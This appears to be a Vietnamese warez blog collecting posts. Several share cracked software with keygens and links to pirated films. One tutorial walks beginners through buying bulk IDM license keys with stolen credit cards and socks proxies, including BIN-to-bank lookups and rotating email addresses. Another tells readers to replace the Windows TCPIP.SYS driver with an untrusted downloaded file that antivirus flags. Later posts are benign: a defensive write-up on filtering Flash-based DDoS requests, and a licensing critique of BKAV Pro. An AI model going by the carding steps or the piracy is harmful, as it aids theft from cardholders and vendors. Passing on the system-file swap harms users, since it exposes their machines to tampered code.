Free Soft 4 Everyone | Another part: H@cK Tuts.

Download tại đây nhá :
http://www.mediafire.com/?ymdvuhxwe4o

Lưu ý :

Chỉ dành cho những người mới vào hack, không biết ngõ buy :D

ĐỌC THÊM !!!!

Tên miền quốc gia Việt Nam .VN, theo tiêu chuẩn quốc tế ISO 3116 được Tổ chức liên hợp quốc phân bổ, xác định là chủ quyền quốc gia Việt Nam trên mạng Internet. Trong quá trình hội nhập, tên miền .VN đã và đang khẳng định tên tuổi của Việt Nam trên thương trường quốc tế.

Khác với tên miền quốc tế .com, .net. Tên miền .VN có những lợi thế sau:

Được pháp luật Việt Nam bảo vệ: Theo tinh thần Luật Công nghệ thông tin, Nghị định số 63/2007/NĐ-CP ngày 10/04/2007 của Chính phủ quy định "các tổ chức, cá nhân tạo đường dẫn trái phép hoặc dùng các biện pháp để chiếm đoạt, kiểm soát, khống chế tên miền .VN hợp pháp của tổ chức, cá nhân khác sẽ bị phạt tiền từ 10.000.000 đồng đến 20.000.000 đồng ".

Kỹ thuật tin cậy, an toàn: Hệ thống máy chủ tên miền .VN (DNS) quốc gia, tạo nên bởi 6 cụm máy chủ trên cả nước, được giám sát 24/24 giờ với hệ thống dự phòng đảm bảo độ tin cậy, vận hành an toàn, tên miền không bao giờ bị ngừng hay bị "bẻ ghi" sang các trang web có nội dung không mong đợi khác.

Hạn chế tối đa khi mất liên lạc quốc tế: Sử dụng tên miền.VN, lưu trữ tại các máy chủ có địa chỉ IP ở Việt Nam, khi mất liên lạc quốc tế như những trường hợp đứt cáp biển vừa qua thì liên lạc và giao dịch internet trong nước vẫn còn nguyên. Ngược lại sẽ mất toàn bộ liên lạc internet cả trong nước lẫn quốc tế.

Được Hệ thống trung chuyển Internet trong nước - VNIX của VNNIC phục vụ: Sử dụng tên miền.VN, lưu trữ tại các máy chủ có địa chỉ IP ở Việt Nam được hệ thống VNIX tự động trung chuyển tất cả lưu lượng internet trong nước bằng con đường ngắn nhất, nhanh nhất.

Xu hướng sử dụng cộng đồng: Hiện tại đăng ký một tên miền .VN, được miễn phí một tên miền tiếng việt có dấu. Đây là tên miền bằng tiếng mẹ đẻ mà quốc tế đã công nhận, được gọi là tên miền đa ngữ ( IDN ) ngày càng phát triển và đang tăng nhanh với số lượng lớn ở các nước quanh ta, là xu hướng tất yếu để phát triển công nghiệp nội dung trên internet của cộng đồng trong tương lai gần.

Lợi ích tìm kiếm và quảng bá: Hầu hết các chương trình tìm kiếm trên mạng (đặc biệt là google.com.vn ) sẽ ưu tiên liệt kê các tên miền có mã quốc gia .VN lên trước nhất khi search tại Việt Nam. Ví dụ: Nếu bạn tìm kiếm từ “Viettel” thì chương trình tìm kiếm sẽ đưa ra web có tên miền viettel.com.vn trước .

Chăm sóc, hỗ trợ: VNNIC và các Nhà đăng ký tên miền .vn (registrar) luôn sẵn sàng trợ giúp người đăng ký sử dụng giải quyết các vấn đề kỹ thuật cũng như hành chính liên quan đến tên miền .VN. Nhắc nhở trước chủ thể sử dụng đóng phí duy trì khi tên miền đến hạn và cho phép tên miền được quá hạn 30 ngày mới xóa chính thức, điều mà không bao giờ có khi dùng tên miền .com; .net.

Đăng ký thuận tiện: Các chủ thể có nhu cầu đều có thể dễ dàng đăng ký tên miền .VN thông qua công ty Nhân Hòa với thủ tục đăng ký tên miền .VN đơn giản, nhanh gọn và dễ dàng cho người đăng ký.

ĐỌC THÊM !!!!

NhấP vÀo hìNH ĐỂ XeM tO HƠn

ĐỌC THÊM !!!!

SnagIt is the most useful tool you will find to combine pictures, words, and other objects into a meaningful illustration...
SnagIt delivers customized screen captures with the press of a hotkey. SnagIt is the only screen capture software that captures images, text, and video from your Windows desktop. Effortlessly produce perfect graphics and video with this complete capture solution.
Now, with SnagIt add-ins, you can put SnagIt right in your toolbar! SnagIt's new add-in toolbars provide quick access to the most common capture features right from within Word, PowerPoint and Explorer.
Screen capture is the process of copying what you see on your screen. SnagIt captures various types of data in dozens of different ways, enabling you to capture, edit and share anything on your screen.
Tohelp you start using SnagIt, here are five popular ways SnagIt is used to capture what is on your screen

Homepage

Download Setup

Download Keymaker

ĐỌC THÊM !!!!

GoldWave

GoldWave is is a top rated, a comprehensive digital audio editor. GoldWave is ideal for people who work with audio for CD editing, archive restoration, speech analysis, radio and TV, Java and Web pages, games, or just for fun. You can use it to make everything from elaborate answering machine messages to professional, high quality CD audio content.

GoldWave can do:

· Play, edit, mix, and analyze audio
· Record audio from cassettes, vinyl records, radio, etc. through your computer's line-in
· Record dictation through a microphone or play dictation back at a slower speed for transcription
· Record and edit audio for podcasting
· Apply special effects, such as fade, equalizer, doppler, mechanize, echo, reverse, flanger, and more
· Digitally remaster and restore old recordings with noise reduction and pop/click filters
· Make perfect digital copies of audio CD tracks using the CD Reader tool and save them in wma, mp3, ogg files
· Edit music for dance programs, figure skating, gymnastics
· Analyze human speech, bird song, whale song
· Demonstrate digital signal processing with filter effects and the expression evaluator tool
· View a variety of real-time visuals and VU meters
· Convert files to/from different formats, such as wav, wma, mp3, ogg, aiff, au, vox and even raw binary data

General Features:

· Multiple Document Interface for working with many files in one session
· Huge file editing: 4GB and beyond (NTFS only)
· Configurable RAM or hard drive editing
· High quality: 24 bit, 192kHz
· Real-time visuals: bar, waveform, spectrogram, spectrum, VU meter, ...
· Fast non-destructive editing. Cut, copy, delete, and undo take only a fraction of a second, regardless of the file size
· Multiple undo levels
· Many effects: distortion, doppler, echo, filter, mechanize, offset, pan, volume shaping, invert, resample, equalizer, time warp, pitch, reverb, volume matcher, channel mixer, ...
· Effect previewing and presets
· Audio restoration filters: noise reduction, pop/plick, smoother
· Supported file formats (wav, mp3, ogg, aiff, au, vox, mat, snd, voc, raw binary data, text data, and more)
· File format plug-ins for the next generation of audio compression, such as WMA, Ogg Vorbis, and FLAC.
· DirectX Audio Plug-in hosting
· Effect chain editor
· Audio CD Reader
· Batch processing and conversion
· Drag-and-drop cue points, with auto-cue and file splitting features.
· Direct waveform editing with the mouse
· Customizable tool bars
· Customizable waveform colours
· Several built-in accessibility features and keyboard shortcuts

Changes in v5.25 include:

* Changed device naming to work better with Vista.
* Fixed index out of bound problem on some Vista systems.

Download + Keygen

ĐỌC THÊM !!!!

Create stunning 3D transitions, titles and animation effects with Pinnacle Hollywood FX Pro version 5, the powerful creative tool for Pinnacle Edition, Pinnacle Studio and Pinnacle Liquid Systems. Packed with over 400 exciting 3D effects and transitions, Pinnacle Hollywood FX Pro version 5 gives you more creative freedom than any other application in its class.

Features Include:
Advanced Keyframe Editing - Hollywood FX Pro gives you full keyframe editing of flight paths and every parameter through its advanced keyframe editor. HFX Pro includes advanced shift and scale tools as well as spline curve presets.

Compatible with major editing tools - Hollywood FX Pro is comaptible with all you favourite editing tools like Pinnacle Edition DV, Adobe Premiere, Avid MCXpress/Xpress/Composer/Symphony, in:sync Speed Razor, Fast Video Machine & 601, Ulead Media Studio Pro, Media 100 & Finish, DPS Video Action Pro/Velocity, Panasonic DVEdit & NewsByte, Sony ES-3.

Convenient Control - With every transition you can change flight direction, lighting, shadows, shine, motion blur, trails and antialiasing with the click of the mouse.

Create Your Own FX - Hollywood FX Pro provides a full set of tools to quickly and easily create your own FX. Use with one of over 300 FX that come with HFX Pro, or start from scratch and use advanced tools like object cloning to create incredible 3D transitions, MultiWindow FX, and 3D composites in minutes.

Easy To Use - Simply drag-and-drop Hollywood FX Pro into your timeline like any other transition. The HFX dialog will appear and you can select a transition and change your options.

Instant feedback - Instant feedback while designing a composite is crucial for today's projects. Hollywood FX's interface has been designed to allow quick alteration. You want that ball to fly off the top without re-keying, simply rotate the easy direction dial.

Media Control - In addition to transitions, Hollywood FX Pro includes a wide range of 3D MultiWindow Effects with additional video sources that can be mapped easily onto objects in HFX.

Organised - Transitions are organised into convenient categories with icons that let you find the transition you want instantly. You can even reorganise effects into your own categories.

Plugin Power - Hollywood FX Pro includes a basic set of image filters and 3D warp plugins to add real power to customize any FX. Explode, peel, ripple or twist any 3D object. Use chroma key with any media.

Surfaces - Surfaces of 3D objects can be mapped with video or simple colours to create an incredible variety of FX. You have full control over basic colour, luminous colour, and shine.

Minimum System Requirements:

Windows 95, 98, NT, 2000
90 Mhz Intel Pentium or faster
Celeron, 16 or 24 bit colour display 800 x 600
64MB RAM (or more)
100+ MB free hard drive space
CD-ROM drive

FILES : 1X32.2mb
COMPRESS: WinRar
LANGUAGE: English
FIX : Key Gen

http://tinyurl.com/638kl2

ĐỌC THÊM !!!!

nhấP Vào hìNh để XEm To HƠn

ĐỌC THÊM !!!!

Tut này dành cho Newbie thôi nhá, pro nào biết rồi xin đừng cười nhá.
Nguyên liệu:
1. Sock ko cần trùng state
2. CC non, càng nhiều tiền càng tốt
IDM có nhiều pagate nhưng chỉ có regnow và regsoft là dễ còn các gate khác như ShareIT, Paypal, 2CheckOut đều rất khó qua. Tuy nhiên Regnow và pp thường mua được nhưng key rất nhanh bị die, chỉ có regsoft là key khá ngon.
Các bạn có thể vào link trực tiếp sau của Regsoft để mua:

Trích:

https://www.regsoft.net/regsoft/view...roductid=44358

Trong ô điền Quantity(số lượng) thì cứ táng bao nhiêu keys cũng đc(IDM mua càng nhiều giá càng giảm mà

). Nhưng ko nên đến 50 keys, mình thì thường táng 40 keys(=798$), (chưa khi nào thàng công với 50 keys cả)

Điền Bill info.
Email nhớ là Email đúng của mình để sau nó gửi key về, thường thì phải lập rất nhiều email, cùng 1 mail mình chưa khi nào mua dc 2 lần cả.
Trong ô Bank name. ở dưới có ghi chú là nếu Discovery và American Express thì điền là Disc và Amex. Vậy còn với Visa và Master thì thế nào. Các bạn có thể dùng phần mềm sau để biết xem con cc đó của ngân hàng nào :

Trích:

http://rapidshare.com/files/113377475/CC2Bank_1.3.rar

Hoặc vào trang web sau: http://www.cc2bank.net/.
Cách dùng thì dễ thôi ,chỉ cần điền CC num vào tab Bin rồi search là ra ngay Bank name,Country,Bank phone, ABA RN(hình như dùng để verified PP-chưa khi nào làm đc cả ). Phần mềm này cũng có số Busy phone,zipcode của các bang.
Tuy nhiên có 1 số CC num ko nằm trong data của nó nên nếu gặp trường hợp thế các bạn cứ điền bừa là Visa và Master cũng đc(ko nhớ là những trường hợp này có thành công hay ko

)

Continue thôi.
nếu CC còn live thì nó sẽ hiện ra trang orderform để xác nhận các thông tin mình điền là đúng. Trong 1 số trường hợp nó đòi Tax ID, ko biết là do bang,hay do mua nhiều quá hay sao mà nó đòi thế, mình thường điền 6 chữ số (thường thì các trường hợp này là thất bại).

Submit
Vậy là ok rồi,ngồi chờ mail thôi. Trước tiên nó sẽ send mình 1 cái email xác nhận thông tin mình mua, sau đó nếu thàng công thì nó sẽ send email order number thành công có key trong đó. Còn nếu thất bại thì hoặc là nó ko có thư nào cả(chờ dài cổ ), hoặc là có thư noreply, như hình dưới đây mình có cả order ok và Declined.

Nếu đc thì thường email đến rất nhanh, ko quá 1 ngày đâu. Chúc anh em thành công nhá.

ĐỌC THÊM !!!!

Tình hình là dạo này lên mạng thấy rất chi là chậm, block image, flash, video vào hết rồi mà nhiều cái ko ổn, download đc 100kb/s là thấy cao lắm rồi, nản

hôm nay ngồi làm cái tut cho ae

Trích:

thứ 1: với những máy đã cài SP2 trở đi thì như trên microsoft có nói nó giới hạn speed ngay tại máy với lý do tránh bị sập mạng khi có virus nhg báo hại là dù có thuê bao xịn dùng net thì vẫn bị giới hạn nên bảo sao nhà cung cấp kém làm ăn, speed giới hạn 1 phần do máy rồi

ok download cái sau về : _http://rapidshare.com/files/105241617/TeakBandwithInternet.rar.html

cái này có thể vài antivirus nó báo vì có chứa mã thay đổi nội dung file hệ thống nhg ko sao cả, run thì dos mở lên đọc thì sẽ là tweak mạng từ 10 lên 50 chọn Y ok nếu có cửa sổ báo origin lại file thì inorg nó đi nhé. xong rồi giờ download toàn 300kb/s

tình hình cái này ko run đc trên vista nên mọi ng có thể down thử cái sau về

_http://rapidshare.com/files/105874724/TCPIP.SYS.html

chép đè lên theo đường dẫn C:\WINDOWS\system32\drivers xem có đc ko vì file hệ thống nó như nhau mà cái này mình tweak rồi

Trích:

thứ 2: cái này của google

_http://dl.google.com/webaccelerator/GoogleWebAcceleratorSetup.msi

download về run thì nó sẽ tự động tích hợp vào IE và firefox, change ip luôn tốc độ nhanh hơn hẳn
nếu browser của ae ko đc tích hợp thì làm như sau
- mở cái quản lý connect như proxy đó
- sẽ có cái dòng đại loại AUTOMATIC PROXY URL thì add cái sau vào _http://localhost:9100/proxy.pac

tình hình là có thể ko log vào đc 4rum thì vào option của nó add thêm web vào thì ok

xong ok thử net xem nào nhanh hơn hẳn

Trích:

thư 3: change DNS ở máy thành 208.67.222.222 và 208.67.220.220 cái này của open dns có chống phishing luôn dùng khỏi chê

ĐỌC THÊM !!!!

Nhấp vào hình để XEM TO HƠN :D

ĐỌC THÊM !!!!

Info:

Code:

http://www.imdb.com/title/tt0080801/

Plot Outline:

Trích:

A Sho in the Kalahari desert encounters technology for the first time--in the shape of a Coke bottle. He takes it back to his people, and they use it for many tasks. The people start to fight over it, so he decides to return it to the God--where he thinks it came from. Meanwhile, we are introduced to a school teacher assigned to a small village, a despotic revolutionary, and a clumsy biologist.

Code:

http://bitroad.net/download/1b419052...GeeKS.avi.html

Or

Code:

http://adrive.com/public/5c81aae69e5...d90a1d451.html

Or

Code:

http://friendlyfiles.net/download/1b...GeeKS.avi.html

Or

Code:

http://sharedzilla.com/en/get?id=127830

Info:

Code:

http://www.imdb.com/title/tt0097443/

Plot Outline:

Trích:

Xixo is back again. This time, his children accidentally stow away on a fast-moving poachers' truck, unable to get off, and Xixo sets out to rescue them. Along the way, he encounters a couple of soldiers trying to capture each other and a pilot and passenger of a small plane, who are each having a few problems of their own.

Code:

http://bitroad.net/download/82a59643...GeeKS.avi.html

Or

Code:

http://adrive.com/public/92c067ec6c7...c36248f67.html

Or

Code:

http://www.mandamais.com.br/download...v2732008142331

Or

Code:

http://friendlyfiles.net/download/82...GeeKS.avi.html

Or

Code:

http://sharedzilla.com/en/get?id=127829

Info:

Code:

http://www.imdb.com/title/tt0101864/

Plot Outline:

Trích:

Two guys, one of them a magician, are transporting an ancient chinese vampire who can only be controlled by a series of yellow tapes, and is the ancestor of the other guy. On the way, while flying over Africa, their plane stalls. And of all places, where do they land? That's right, in the village of the tribe of "The Gods Must Be Crazy".

Code:

http://bitroad.net/download/c7074c48...GeeKS.avi.html

Or

Code:

http://adrive.com/public/465617e5484...5036f8dc5.html

Or

Code:

http://www.mandamais.com.br/download...v2832008162132

Or

Code:

http://sharedzilla.com/en/get?id=128465

Or

Code:

http://friendlyfiles.net/download/c7...GeeKS.avi.html

ĐỌC THÊM !!!!

bẤM Vào HìNh để Xem To HƠn

ĐỌC THÊM !!!!

What is Banner Maker Pro?

Banner Maker Pro is software that quickly (and easily!) allows you to create web-based banner ads, web buttons, animated gifs, logos, image ads and other web graphics. It's not just for banners! It's an animated banner ad maker, button maker, web header and logo maker all in one.

By using a wizard-like interface, Banner Maker Pro allows you to easily create professional looking banners, buttons, and graphics for web pages in just minutes. Simply follow the tabs at the top of the program to go step-by-step in the image making process. When you have completed the image, just save it as a GIF or JPEG and add it to your website.

Create an animated banner or button in under 5 minutes! No graphics expertise needed.

If you are not a graphics expert....

Then Banner Maker Pro is for you. There is no easier way to make web graphics. It's a full featured graphics program with no hidden templates, disappearing tools, or a long learning curve. And it's all less than the cost of hiring a graphic artist.

If you are a graphics expert....

Banner Maker Pro is for you, too. There is no faster way to make high quality web graphics. With the Power Preview, there is no faster way to view hundreds of different variations of your images.

Benefits of using Banner Maker Pro

Banner Maker Pro is the easiest way to make web graphics. You can create an animated banner in just 5 minutes with no graphic skills.
More customizable than other online banner and button makers. Create any sized banner with any image or logo, with any font on your computer, using over 60 different types of animations.
Over 500 backgrounds and stand alone images. Backgrounds include common window dialogs to unique custom created backgrounds that cannot be found anywhere else. Images include over 40 different "click here!" buttons and 40 different common window control images. There are over 300 different backgrounds in different styles and sizes.
Great text effects. Add borders to your text. Add glow, sharp, and diffuse shadows. Set the text at an angle or wrap it around a circle.

Download :

http://www.mediafire.com/?zstmgz94tz2

ĐỌC THÊM !!!!

Nha^'p vo hi`nh de xem to hon :D

ĐỌC THÊM !!!!

MusicMatch Jukebox 10.0.4033 Plus Labels: Softwares | 0 comments

Burner Plus is the ultimate solution for creating MP3 and audio CDs. Burn at speeds of up to 48x*. Drag and drop tracks from your Music Library, playlist or any Windows Explorer.
Keep track of free space on your CDs and fill them to the max with the easy-to-read capacity meter, or evenly divide an unlimited number of tracks among multiple discs with SmartSplit. It s faster, easier and more powerful than any CD burner you ve ever used.

:: Rip like a Rock Star
Unlock ripping/recording speeds of up to 40x (8 times faster than with the free Jukebox) and get cleaner, crisper, richer sound at a fraction of the file size with mp3PRO encoding. (Ripping means recording your CDs and encoding them into MP3 or other digital files.)

:: Make your mark
Your music can look as good as it sounds. Create full-color custom jewel case covers and inserts with CD cover art, up to 150 track titles and personal notes. You can also add text,graphics and album covers to CD labels and choose from a selection of border graphics to make your custom CD complete

Link download :
http://rapidshare.com/files/12333209...0.4033_new.rar

ĐỌC THÊM !!!!

FutureDecks Pro 1.1.0

Looking for a smart, powerful pro DJ software? Look no more! Meet FutureDecks Pro - the professional DJ mixing software.

With FutureDecks Pro you can really mix your songs, nothing else needed but your imagination.
Beat-matching is just a click away and also are seamless beat-aware loops, effects and many other things.
All these thanks to a brand new audio engine.

What you get:

- classic DJ setup with 2 decks, pro mixer and playlists
- fully manual or automatic mixing (one-click beat-matching)
- seamless intelligent looping and “skipbeat”
- automatic BPM detection (grid like) with batch-mode function
- vinyl simulation including scratch, pitch, reverse play, brake
- separate headphones output and song pre-listening
- support for VST effects and AudioUnits, eqs, filters
- analog input for microphone/turntables/CD-players, Talk-Over
- controllers supported natively (zero-configure):

Behringer BCD2000/BCD3000, Hercules controllers
- additional MIDI IN with LEARN - assign knobs/switches to fx parameters
- advanced support for external mixers
- perceptual automatic gain
- sample player (sampler)
- record your mixes to WAV or AIFF
- KeyLock (MasterTempo) with on/off selector, gradual pitch bend
- ASIO/CoreAudio low-latency support
- browsing system with unlimited lists, disk explorer and database
- load the whole song in RAM memory for instant access
- audio-cd support on Win/Mac (intelligent cd detection/loading)
- can read mp3, m4a, wav, aiff, ogg, cda, mpeg and many more files

Download:

http://www.mediafire.com/?dxj5bymgnbz

ĐỌC THÊM !!!!

Ý tưởng

Dựa vào gợi ý của Amit Klein:

Notice the first limitation of the technique - it states that no raw CR and LF can be placed in the body section. This means that the technique cannot be used to send (POST) requests whose body complies with the "multipart/form-data" content-type format (this format uses raw CRs and LFs to mark headers and boundaries). In other words, a (POST) request whose body is a valid "multipart/form-data" stream is guaranteed (as far as today's knowledge extends) not to be sent from a Flash player. Web application authors can therefore use HTML forms whose ENCTYPE attribute is set to "multipart/form-data", and enforce that the submission contains a valid multipart/form-data body. Once these mechanisms are in place, and a request passes through, it is known not to originate from a Flash player, so the attack
described here is irrelevant.

Gợi ý ở trên có thể được diễn giải như sau:

Cách thức browser xử lí các HTML form có enctype = "multipart/form-data" và enctype = "application/www-urlencoded" (default) hoàn toàn khác nhau. Điểm khác nhau đặc trưng là khi submit (nghĩa là tạo ra POST request) form "multipart/form-data", browser sẽ tự động set Content-type là "multipart/form-data", còn khi submit các form khác, browser sẽ sử dụng Content-type là "application/www-urlencoded".

Flash (với các hàm thường được sử dụng để DDoS như LoadVars, GetURL hay SendtoURL, etc...) không thể gửi POST request theo định dạng "multipart/form-data". Đây chính là "gót chân Asin" của Flash.

Do đó nếu bằng một cách nào đó, ta có thể set tất cả các form thành enctype = "multipart/form-data", nghĩa là ép tất cả POST request có Content-type là "multipart/form-data", ta sẽ có thể phát hiện ra những POST request xuất phát từ Flash, vốn dĩ luôn có Content-type là "application/www-urlencoded".

Hiện thực

Để hiện thực hóa ý tưởng này, ta cần phải có một cách nào đó biến tất cả các HTML form thành enctype = "multipart/form-data", rồi sau đó phải chỉnh sửa lại server-side code để xử lí các form này (tin vui: thử nghiệm với một vài ngôn ngữ lập trình phổ biến như PHP, Java và Ruby, tôi thấy rằng không cần phải chỉnh sửa server-side code, các ngôn ngữ này đều có cách thức xử lí giống nhau với hai loại enctype của HTML form).

Vậy nhiệm vụ còn lại là điều chỉnh HTML form. Cách dễ thấy nhất là sửa code HTML. Phần còn lại của bài này tôi trình bày một cách khác, không cần chỉnh sửa code HTML. Đó là sử dụng output filter của Apache 2.x.

Ý tưởng cơ bản là triển khai một cái reverse proxy bằng Apache 2.x, đứng trước tất cả các server cần được bảo vệ khỏi xFlash. Trên cái reverse proxy đó, ta sẽ sử dụng một output filter module làm nhiệm vụ tự động thêm attribute enctype="multipart/form-data" vào tất cả các HTML form mà nó thấy.

Ban đầu tôi tính viết riêng một cái Apache 2.x module để làm chuyện này, nhưng rồi vô tình phát hiện ra có sẵn một module đã làm chuyện đó rồi. Đó là module mod_line_edit:

mod_line_edit is a general-purpose filter for text documents. It operates as a simple on-the-fly line editor, applying search-and-replace rules defined in a configuration or .htaccess file.

Để sử dụng mod_line_edit, trước tiên bạn cần phải biên dịch nó. Có hai cách biên dịch: biên dịch mod_line_edit thành một module tĩnh hoặc thành một module động (DSO). Nói chung để tối ưu hóa tốc độ xử lý, nên biên dịch mod_line_edit thành một module tĩnh theo cách sau đây:

server$ cd /usr/local/src
server$ wget http://www.tux.org/pub/net/apache/dist/httpd/httpd-2.2.4.tar.gz
server$ wget http://apache.webthing.com/mod_line_edit/mod_line_edit.c
server$ tar -xzf httpd-2.2.4.tar.gz
server$ mkdir -p httpd-2.2.4/modules/line_edit
server$ cp mod_line_edit.c httpd-2.2.4/modules/line_edit
server$ cp httpd-2.2.4/modules/echo/Makefile.in httpd-2.2.4/modules/line_edit

server$ cd httpd-2.2.4/
server$ "./configure" \
"--prefix=/opt/httpd" \
"--with-module=line_edit:mod_line_edit.c"

Cấu hình mod_line_edit cực kì đơn giản. Đầu tiên thêm hai dòng này vào httpd.conf để kích hoạt mod_line_edit:

FilterProvider textedit line-editor resp=Content-Type $text/
FilterChain textedit

Để mod_line_edit tự động thêm attribute enctype="multipart/form-data" vào tất cả các HTML form, thêm dòng sau đây vào nơi thích hợp (virtual host, location, etc...)

LERewriteRule '(<>' '$1 enctype="multipart/form-data">' Ri

Rồi xong, tất cả các form HTML của bạn sẽ tự động có enctype = "mutilpart/form-data". Nghĩa là POST request của bạn sẽ luôn có Content-type là "multipart/form-data".

Việc còn lại là cấu hình mod_security để nó phát hiện và loại bỏ các POST request có Content-type là "application/www-urlencoded" xuất phát từ xFlash. Tôi dành phần này lại cho các bạn tự làm.

Ưu điểm và nhược điểm

Phương thức mà tôi trình bày ở trên có những ưu điểm nhất định so với các phương thức phổ biến hiện nay:

Thứ nhất, do phương thức này đánh vào "gót chân Asin" của xFlash nên bạn không cần thay đổi cấu hình mà vẫn có thể phát hiện được xFlash dẫu kẻ tấn công có thay đổi nơi chứa xFlash hay thay đổi mục tiêu tấn công.

Thứ hai, nếu áp dụng theo mô hình reverse proxy, bạn sẽ có thể cùng một lúc bảo vệ được nhiều web-server bên trong khỏi xFlash, rất thích hợp với các hosting provider.

Tuy vậy, phương thức này cũng có những nhược điểm:

Thứ nhất, nó chỉ chống được thế hệ xFlash hiện tại. Theo nghiên cứu của riêng tôi, Flash, cụ thể là Flash Player 9 với ActionScript 3, cực kì nguy hiểm. Cách làm này sẽ không thể chống được thế hệ xFlash mới được phát triển dựa trên tính năng của ActionScript 3. Ngoài ra, nếu kẻ tấn công biết cách khai thác các lỗ hổng của Flash 9 trở về trước, phương thức này cũng sẽ trở nên vô tác dụng.

Thứ hai, nó chỉ phát hiện và chống được POST request từ xFlash. Theo anh con-ma-le cho biết, một số biến thể xFlash hiện tại chỉ chơi GET request mà thôi.

Thứ ba, đối với những website có áp dụng AJAX, phương thức này có khả năng sẽ gây ra false positive. Lý do là XMLHTTPRequest của Javascript cũng gửi POST request có Content-type là "application/www-urlencoded". May mắn là tất cả các AJAX framework mà tôi biết đều có khả năng thêm custom header vào HTTP request, do đó bạn có thể nhìn vào header này để phân biệt giữa xFlash và AJAX.

Thứ tư, với cái rule của mod_line_edit ở trên, website của bạn có nguy cơ không còn tuân theo chuẩn của W3C nữa. Ví dụ như nếu một webpage của bạn đã có sẵn enctype = "multipart/form-data", khi mod_line_edit thêm vào một attribute tương tự, webpage này sẽ không còn đúng chuẩn W3C.

Kết luận

Phương thức này không phải là "silver bullet" có thể giải quyết dứt điểm xFlash. Tuy vậy nó cũng có khả năng hạn chế được sức tàn phá của thế hệ xFlash hiện tại. Tôi nghĩ chỉ có hai cách có thể giải quyết dứt điểm xFlash:

Không sử dụng Flash. Nếu bạn hiểu rõ Flash nguy hiểm đến cỡ nào, hoặc nếu bạn tin tưởng tôi, tôi khuyên bạn không nên sử dụng Flash hoặc it nhất mặc định là không cho chạy Flash, rồi có thể enable theo từng website cụ thể. NoScript và FlashBlock có thể giúp bạn làm chuyện này dễ dàng!

Đừng cố chống xFlash bằng cách nhìn vào các đặc trưng của nó. xFlash hoàn toàn có thể tạo ra những request giống y những request hợp lệ. Hãy chống xFlash như chống các loại DDoS khác, nghĩa là: a) đầu tư vào cơ sở hạ tầng, bao gồm hệ thống server, đường truyền và con người; b) tối ưu hóa hệ thống, đảm bảo tốc độ xử lí tốt nhất với chi phí bỏ ra; c) thiết kế hệ thống thật scalable, bởi xét cho cùng, bị xFlash tấn công cũng tương tự như lượng user của bạn tăng lên đột biến.

ĐỌC THÊM !!!!

Bác TQN ở HVAOnline vừa mới có một phát hiện thú vị:

Trước mắt, sơ bộ ta thấy BKAV Pro đã vi phạm bản quyền ở 2 điều sau:

1. Dùng BSD open source library diStorm64 mà không tuân theo luật của BSD.

2. Dùng shareware rar.exe của WinRAR, không có đăng ký và không có license cho từng máy cài BKAV Pro.

Hai soft này nằm trong file SysInfo.dll của BKAV Pro, file .dll này nằm trong thư mục %Program Files%\BKAV. Các reverser nào không ngại đụng chạm đến BKAV thì có thể phân tích file .dll này để kiểm chứng và đánh giá đúng sai.

Về việc dùng BSD library, giấy phép BSD của diStorm64 có quy định (đoạn tô đậm là do tôi tô):

The ultimate disassembler library.
Copyright (c) 2003,2004,2005,2006,2007,2008, Gil Dabah
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

* Neither the name of the diStorm nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

Theo tìm hiểu cũng của TQN và nhiều người khác, BKIS không hề thực hiện dòng tô đậm ở trên. Không thể tìm thấy bất cứ dòng nào đề cập đến cái "copyright notice, this list of conditions and the following disclaimer" này trong tài liệu của BKAV Pro cũng như trên website của BKIS.

Về vấn đề BKIS nhúng rar.exe vào BKAV Pro, giấy phép của rar.exe có những quy định thế này (những đoạn tô đậm là do tôi tô):

The RAR (and its Windows version - WinRAR) archiver are shareware. This means:

All copyrights to RAR and WinRAR are exclusively owned by the author - Alexander Roshal.
Anyone may use this software during a test period of 40 days. Following this test period of 40 days or less, if you wish to continue to use WinRAR, you MUST register.
There are 2 basic types of licenses issued for WinRAR, these are:

a. A single computer USAGE license. The user purchases ONE license to USE the WinRAR archiver on ONE computer.

b. A Multiple USAGE license. The user purchases a number of USAGE licenses for use, by the purchaser, the purchaser's employees or accredited agents, on the same number of computers.

The number of licenses in network environment must not be less than the maximum possible amount of simultaneous users.

Once registered, the user is granted a non-exclusive license to use WinRAR on as many computers as defined by the licensing terms above according to the number of licenses purchased, for any legal purpose. The registered WinRAR software may not be rented or leased, but may be permanently transferred, in it's entirety, if the person receiving it agrees to the terms of this license. If the software is an update, the transfer must include the update and all previous versions.
The RAR/WinRAR unregistered trial version may be freely distributed, with exceptions noted below, provided the distribution package is not modified in any way.

a. No person or company may distribute separate parts of the package with the exception of the UnRAR components, without written permission of the copyright owner.

b. The RAR/WinRAR unregistered trial version may not be distributed inside of any other software package without written permission of the copyright owner.

c. Hacks/cracks, keys or key generators may not be included on the same distribution.

Như vậy, điều 2 quy định, ai mà sử dụng RAR archiver (là file rar.exe) thì sau 40 ngày phải đăng ký. Theo TQN tìm hiểu, phiên bản rar.exe được đính kèm với BKAV Pro là phiên bản chưa đăng ký, nghĩa là sau 40 ngày, tất cả những ai mà sử dụng BKAV Pro đều vi phạm bản quyền của tác giả RAR/WinRAR.

Điều 4, khoản a và b quy định, nếu không có sự đồng ý ở dạng văn bản (written permission) của tác giả RAR/WinRAR thì không ai được phép phân phối toàn bộ hoặc phân phối một phần của bộ phần mềm RAR/WinRAR. BKAV Pro có chứa (vi phạm 4b) và chỉ chứa mỗi rar.exe (vi phạm 4a), nên nếu chưa có sự đồng ý của tác giả RAR/WinRAR, thì rõ ràng BKIS đã vi phạm quy định này.

Tôi đã có viết email hỏi tác giả RAR/WinRAR xem trước giờ họ đã có đồng ý cho BKIS tách và nhúng rar.exe vào BKAV Pro hay chưa (tôi cũng có email cho tác giả của diStorm64 về việc BKIS vi phạm bản quyền của họ). Chắc nay mai sẽ có trả lời sớm.

Nhưng thậm chí nếu câu trả lời của RAR/WinRAR là có, thì tôi cũng đang thắc mắc, không biết các vị sản xuất "phần mềm diệt virus được hơn 90 quốc gia sử dụng" sẽ bình luận thế nào về việc cố tình đẩy người sử dụng vào tình trạng vi phạm bản quyền, như đã phân tích ở trên?

Trong một diễn biến khác, gần đây Blue Moon Security phát hiện và thông báo cho BKIS hai lỗi bảo mật của BKAV Pro nhưng BKIS từ chối, không xem đây là lỗi và quyết định không sửa chúng.

